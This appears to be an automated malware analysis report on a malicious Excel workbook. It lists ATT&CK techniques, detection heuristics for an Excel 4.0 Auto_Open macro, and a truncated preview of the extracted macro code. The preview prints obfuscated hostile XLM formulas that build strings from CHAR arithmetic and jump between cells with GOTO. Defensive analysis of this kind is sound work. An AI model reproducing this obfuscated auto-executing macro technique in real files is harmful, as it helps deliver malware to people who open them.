MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically triggering an Auto_Open event. Critical heuristics indicate the use of dangerous formula APIs, including the RUN function, suggesting an attempt to execute arbitrary code. The macro attempts to construct a string using CHAR and arithmetic operations, likely to form a command or payload.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129349 bytes |
SHA-256: 2dc0d98bec8d73bfc6b8c14a230be3f6086a007b417c048af22e32023fa457ec |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!DS17333 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,IF3,"",-0.31437125748502992018 ' Sheet,FC98,"",17.89898989898989967173 ' Sheet,ER114,"",0.71428571428571430157 ' Sheet,DM140,"",-431.00000000000000000000 ' Sheet,FS208,"",1367.00000000000000000000 ' Sheet,IS271,"",2.00404858299595156623 ' Sheet,O299,"",-279.00000000000000000000 ' Sheet,IE342,"",-0.50000000000000000000 ' Sheet,GN352,"",-2.01724137931034475102 ' Sheet,DJ356,"",-2.55844155844155851653 ' Sheet,EO356,"",414.00000000000000000000 ' Sheet,IY357,"",-23.60001953124999829470 ' Sheet,BF378,"",-41.60003906250000227374 ' Sheet,JJ428,"",4.10144927536231840293 ' Sheet,JE460,"",4.04347826086956541047 ' Sheet,JS546,"",-377.20031249999999545253 ' Sheet,ED550,"",0.95141700404858298157 ' Sheet,DK553,"",273.00000000000000000000 ' Sheet,JK572,"",-506.00000000000000000000 ' Sheet,M679,"",1681.00000000000000000000 ' Sheet,HE701,"",13.00000000000000000000 ' Sheet,GX713,"",-24.96001953125000127898 ' Sheet,DQ775,"",1.13360323886639680069 ' Sheet,EG802,"",0.26855123674911662857 ' Sheet,BJ824,"",-5.47540983606557407626 ' Sheet,IU901,"",-19.00000000000000000000 ' Sheet,FA968,"",-0.22335025380710660237 ' Sheet,GC993,"",-538.00000000000000000000 ' Sheet,CD1000,"FORMULA.FILL(CHAR(EP44466*FD60927)&CHAR(EP44466/FM5895)&CHAR(FJ41569*EY9562)&CHAR(IX30255+DN23387)&CHAR(BD47887+DD9479)&CHAR(GB37214/Q56759)&CHAR(DU55636-IX55375)&CHAR(BD47887-K38992)&CHAR(BD47887/EH17998)&CHAR(DU55636/BO58740)&CHAR(DT47650+V24291)&CHAR(IN45982-J26248)&CHAR(DU55636+BJ37680)&CHAR(DU55636+II7611)&CHAR(IX30255-S61646)&CHAR(DT47650*FM20739)&CHAR(DU55636/DD21989)&CHAR(J62209/EN30872)&CHAR(GB37214/DH51096)&CHAR(IN45982*HZ50302)&CHAR(GB37214/CL32245)&CHAR(DT47650-JR32585)&CHAR(FJ41569-HH31651)&CHAR(FJ41569*CW28529),GQ48262)","" ' Sheet,CD1001,GOTO(GC10480),"" ' Sheet,FD1007,"",-0.30239520958083832003 ' Sheet,IX1043,"",-0.17730496453900709830 ' Sheet,IL1049,"",0.19081272084805653289 ' Sheet,CA1091,"",506.00000000000000000000 ' Sheet,DU1111,"FORMULA.FILL(CHAR(FJ41569+DZ31429)&CHAR(EP44466*ED26199)&CHAR(DT47650/IY14638)&CHAR(EP21599-JB18609)&CHAR(EP21599/GN352)&CHAR(DT47650+FP25584)&CHAR(EP21599-FG34024)&CHAR(DU55636+ED44414)&CHAR(EP44466+R41561)&CHAR(DT47650-EQ3052)&CHAR(J62209/BW45988)&CHAR(IX30255*EL35537)&CHAR(DU55636/EQ53185)&CHAR(EP21599+ID11354)&CHAR(DT47650+FE1432)&CHAR(EP21599/JN65161)&CHAR(GB37214*JH63377)&CHAR(FJ41569/IB1599)&CHAR(EP44466*HW32639)&CHAR(BD47887+JS22956)&CHAR(GB37214/EQ28643)&CHAR(J62209*BT48142)&CHAR(IN45982-GG13869)&CHAR(J62209+JM6492)&CHAR(DT47650+DK46263)&CHAR(EP44466/GK58820)&CHAR(EP44466+BR6568)&CHAR(EP21599-CP34574)&CHAR(EP44466-CB24203)&CHAR(EP21599/HF42662)&CHAR(IX30255-HF46330)&CHAR(GB37214-JE42856)&CHAR(J62209*CS61828)&CHAR(IX30255-JG33187)&CHAR(DT47650/BX24121)&CHAR(EP21599/JB31158)&CHAR(GB37214*V9562)&CHAR(DT47650*CL8238)&CHAR(IX30255+IX6383)&CHAR(FJ41569/DP59289)&CHAR(BD47887+FM27446)&CHAR(BD47887+DV47781)&CHAR(FJ41569/N10602)&CHAR(IN45982+JJ6955)&CHAR(DT47650+FV53977)&CHAR(FJ41569*BO49218)&CHAR(EP21599*IT40560)&CHAR(FJ41569/EY58544)&CHAR(EP44466/FS35436)&CHAR(IN45982+FL23875)&CHAR(EP21599-J22533)&CHAR(BD47887-W55666)&CHAR(DT47650+GG27958)&CHAR(IX30255/DB54336)&CHAR(IX30255-K48302)&CHAR(GB37214*FV43008)&CHAR(DT47650+BI49146)&CHAR(FJ41569/GR30896)&CHAR(J62209+CL3635)&CHAR(GB37214/HH53127)&CHAR(DU55636/DV32463)&CHAR(DU55636/EO59981)&CHAR(BD47887*IH33168)&CHAR(DT47650+CQ34113),JF16297)","" ' Sheet,DU1112,GOTO(EO37126),"" ' Sheet,CE1129,"",-357.00000000000000000000 ' Sheet,D1132,"",14.56730769230769162448 ' Sheet,CS1138,"",289.00000000000000000000 ' Sheet,CP1146,"",0.23225806451612904246 ' Sheet,BF1187,GOTO(G ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.